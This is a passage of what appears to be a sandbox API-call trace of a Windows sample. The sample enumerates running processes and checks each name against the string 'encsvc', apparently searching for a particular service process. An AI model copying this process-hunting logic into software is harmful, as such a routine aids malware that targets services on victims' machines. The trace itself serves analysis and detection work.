StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.591] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.592] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571ee8 [0094.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571ee8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.592] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.592] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="encsvc") returned 0x0 [0094.592] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.593] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571f00 [0094.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571f00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.593] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.593] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="encsvc") returned 0x0 [0094.593] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.594] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572050 [0094.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572050, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.594] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.594] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.595] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547a78 [0094.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547a78, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0094.595] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0094.595] StrStrIA (lpFirst="dwm.exe", lpSrch="encsvc") returned 0x0 [0094.595] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.596] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571f18 [0094.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571f18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.596] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.596] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.596] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.597] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571e10 [0094.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571e10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.597] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.597] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.597] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.598] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571fa8 [0094.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571fa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.598] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.598] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.598] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.599] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571f48 [0094.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571f48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.599] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.599] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.599] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.600] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571ff0 [0094.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571ff0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.600] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.600] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.600] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.602] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572008 [0094.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572008, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.602] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.602] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.602] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.603] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571fd8 [0094.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571fd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.603] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.603] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.603] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.604] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571f78 [0094.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571f78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.604] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.604] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.604] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.605] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571f90 [0094.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571f90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.605] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.605] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.605] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.606] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572020 [0094.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572020, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.606] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.606] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.607] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571d68 [0094.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3571d68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0094.607] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0094.607] StrStrIA (lpFirst="spoolsv.exe", lpSrch="encsvc") returned 0x0 [0094.607] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.608] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571db0 [0094.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571db0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.608] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.608] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.609] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.610] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571dc8 [0094.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3571dc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0094.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0094.610] StrStrIA (lpFirst="audiodg.exe", lpSrch="encsvc") returned 0x0 [0094.610] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0094.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.611] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571de0 [0094.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3571de0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0094.611] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0094.611] StrStrIA (lpFirst="sihost.exe", lpSrch="encsvc") returned 0x0 [0094.611] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.612] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571df8 [0094.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571df8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.612] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.612] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.612] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.613] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35722a8 [0094.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35722a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.613] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.613] StrStrIA (lpFirst="taskhostw.exe", lpSrch="encsvc") returned 0x0 [0094.614] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.614] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35721b8 [0094.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x35721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0094.615] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0094.615] StrStrIA (lpFirst="explorer.exe", lpSrch="encsvc") returned 0x0 [0094.615] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0094.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.616] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d0a8 [0094.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x356d0a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0094.616] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0094.616] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="encsvc") returned 0x0 [0094.616] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0094.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.617] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a6f0 [0094.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356a6f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0094.617] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0094.617] StrStrIA (lpFirst="SecurityHealthService.exe", 